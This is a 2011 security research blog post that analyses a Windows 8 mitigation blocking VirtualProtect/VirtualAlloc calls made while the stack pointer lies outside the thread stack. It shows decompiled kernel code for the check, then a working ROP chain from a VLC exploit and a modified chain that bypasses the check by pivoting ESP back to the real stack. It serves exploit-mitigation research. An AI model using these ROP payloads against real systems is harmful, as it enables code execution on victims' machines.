This blog post was originally published on September 21, 2011.
Windows 8 introduced a number of exploit mitigation features, including hardening of both the userland and kernel heaps, mitigation against kernel-mode NULL pointer dereferences, and protection against abuse of virtual function pointer tables. One feature that stood out to me appears to be designed to help mitigate exploits leveraging return-oriented programming (ROP).
For those who don’t know, ROP is a generalization of the classic return-to-libc attack that involves leveraging small sequences of instructions, typically function epilogues, at known addresses to execute arbitrary code incrementally. This is achieved by controlling data pointed to by ESP, the stack pointer register, such that each ret instruction results in incrementing ESP and transferring execution to the next address chosen by the attacker.
Because finding sequences of useful instructions (known as “gadgets”) may be difficult depending on the exploitation scenario, most real ROP exploits use an initial ROP stager to create a writable and executable memory segment that a second-stage traditional shellcode can be copied into. Most frequently, VirtualProtect can be used to mark an existing executable segment writable, or VirtualAlloc can be used to create a fresh segment. Other variations also exist.
A second trait common to many ROP exploits is that the ROP payload itself often doesn’t live in the thread’s stack, due to either the nature of the vulnerability itself or limits on the attacker’s ability to introduce code into portions of the vulnerable application’s address space. Instead, it’s much more common for a ROP payload to be positioned in the heap and pivot the stack pointer into the heap, at which point the ROP payload can run.
Microsoft has evidently been paying attention and noticed these two common factors. In an attempt to mitigate these types of exploits, Windows 8 implements a simple protection mechanism: every function associated with manipulating virtual memory, including the often-abused VirtualProtect and VirtualAlloc, now includes a check that the stack pointer, as contained in the trap frame, falls within the range defined by the Thread Environment Block (TEB). Code courtesy of Alex Ionescu:
char __cdecl PsValidateUserStack()
{
char Status; // al@1
_KTRAP_FRAME *TrapFrame; // ecx@3
_TEB *Teb; // ecx@3
void *.Eip; // [sp+10h] [bp-88h]@3
unsigned int .Esp; // [sp+14h] [bp-84h]@3
void *StackLimit; // [sp+18h] [bp-80h]@3
void *StackBase; // [sp+1Ch] [bp-7Ch]@3
_EXCEPTION_RECORD ExitStatus; // [sp+24h] [bp-74h]@6
CPPEH_RECORD ms_exc; // [sp+80h] [bp-18h]@3
CurrentThread = (_ETHREAD *)__readfsdword(0x124u);
Status = LOBYTE(CurrentThread->Tcb.___u42.UserAffinity.Reserved[0]);// // PreviousMode == User
if ( Status )
{
__asm { bt dword ptr [edx+58h], 13h } // // KernelStackResident, ReadyTransition, Alertable
Status = _CF;
if ( _CF != 1 )
{
TrapFrame = CurrentThread->Tcb.TrapFrame;
.Esp = TrapFrame->HardwareEsp;
.Eip = (void *)TrapFrame->Eip;
Teb = (_TEB *)CurrentThread->Tcb.Teb;
ms_exc.disabled = 0;
StackLimit = Teb->DeallocationStack;
StackBase = Teb->NtTib.StackBase;
ms_exc.disabled = -2;
Status = .Esp;
if ( .Esp < (unsigned int)StackLimit || .Esp >= (unsigned int)StackBase )
{
memset(&ExitStatus, 0, 0x50u);
ExitStatus.ExceptionCode = STATUS_STACK_BUFFER_OVERRUN;
ExitStatus.ExceptionAddress = .Eip;
ExitStatus.NumberParameters = 2;
ExitStatus.ExceptionInformation[0] = 4;
ExitStatus.ExceptionInformation[1] = .Esp;
Status = DbgkForwardException(&ExitStatus, 1, 1);
if ( !Status )
{
Status = DbgkForwardException(&ExitStatus, 0, 1);
if ( !Status )
Status = ZwTerminateProcess((HANDLE)0xFFFFFFFF, ExitStatus.ExceptionCode);
}
}
}
}
return Status;
}
As a result, exploits that leverage a ROP payload stored in the heap cannot return into VirtualProtect or VirtualAlloc to create a writable and executable segment. While this provides yet another hurdle for exploit writers, it’s fairly easy to bypass. Besides writing a full ROP payload that doesn’t have a second stage, which may be difficult depending on the availability of gadgets, one simple way of avoiding this protection is to give it what it wants: ensure ESP points into the current thread’s stack whenever virtual memory functions are called. In the below example, I’ll assume the attacker has access to the original stack pointer through some register, as is the case when a pivot is performed using an xchg instruction. If this isn’t the case, it may be worth investigating ways of finding the stack at runtime.
To demonstrate, let’s take the very basic ROP payload I used for a VLC exploit as an example. After triggering the vulnerability, I pivot the stack pointer into the heap using a gadget that executes the following:
xchg esi, esp
retn
In this case, the ESI register contains a pointer to heap data I control, so by pivoting the stack pointer into this region, I can execute my first-stage ROP payload:
rop = [
rop_base + 0x1022, # retn
# Call VirtualProtect()
rop_base + 0x2c283, # pop eax; retn
rop_base + 0x1212a4, # IAT entry for VirtualProtect -> eax
rop_base + 0x12fda, # mov eax,DWORD PTR [eax]
rop_base + 0x29d13, # jmp eax
rop_base + 0x1022, # retn
heap & ~0xfff, # lpAddress
0x60000, # dwSize
0x40, # flNewProtect
heap - 0x1000, # lpfOldProtect
# Enough of this ROP business...
rop_base + 0xdace8 # push esp; retn
]
This payload pulls the address for VirtualProtect from
the Import Address Table (IAT), calls it to mark the heap executable,
and jumps into the newly-executable heap to run a second-stage
traditional shellcode.
Because ESP points into the heap at the time of the
VirtualProtect call, this exploit would fail due to the
newly introduced mitigation in Windows 8. However, it’s relatively
simple to adapt it to bypass this mitigation. Below is the updated ROP
payload:
rop = [
rop_base + 0x1022, # retn
# Write lpfOldProtect
rop_base + 0x2c283, # pop eax; retn
heap - 0x1000, # lpfOldProtect -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write flNewProtect
rop_base + 0x2c283, # pop eax; retn
0x40, # flNewProtect -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write dwSize
rop_base + 0x2c283, # pop eax; retn
0x60000, # dwSize -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write lpAddress
rop_base + 0x2c283, # pop eax; retn
heap & ~0xfff, # lpAddress -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write &Pivot
rop_base + 0x2c283, # pop eax; retn
rop_base + 0x229a5, # &pivot -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write &VirtualProtect
rop_base + 0x2c283, # pop eax; retn
rop_base + 0x1212a4, # IAT entry for VirtualProtect -> eax
rop_base + 0x12fda, # mov eax,DWORD PTR [eax]
rop_base + 0x1db4f, # mov [esi],eax; retn
# Pivot ESP
rop_base + 0x229a5, # xchg esi,esp; retn;
# Jump into shellcode
rop_base + 0xdace8 # push esp; retn
]
This is a very crude example, but I think it demonstrates the idea
just fine. I write the arguments to VirtualProtect into the
original stack, stored in the ESI register, one at a time. For the
address that will be returned to coming out of
VirtualProtect, I place a pivot to move ESP back to the
heap. Finally, to trigger the whole thing, I actually return into my
pivot gadget, which will pivot ESP back to the original stack and return
into VirtualProtect.
In this case, adapting the exploit added an extra 124 bytes to the payload, but that was mostly due to the fact that I was limited on gadget availability and had to resort to decrementing ESI one value at a time. It’s probably possible to optimize this example with some extra work. In other cases, I’d expect it to be possible to implement this technique with much less overhead.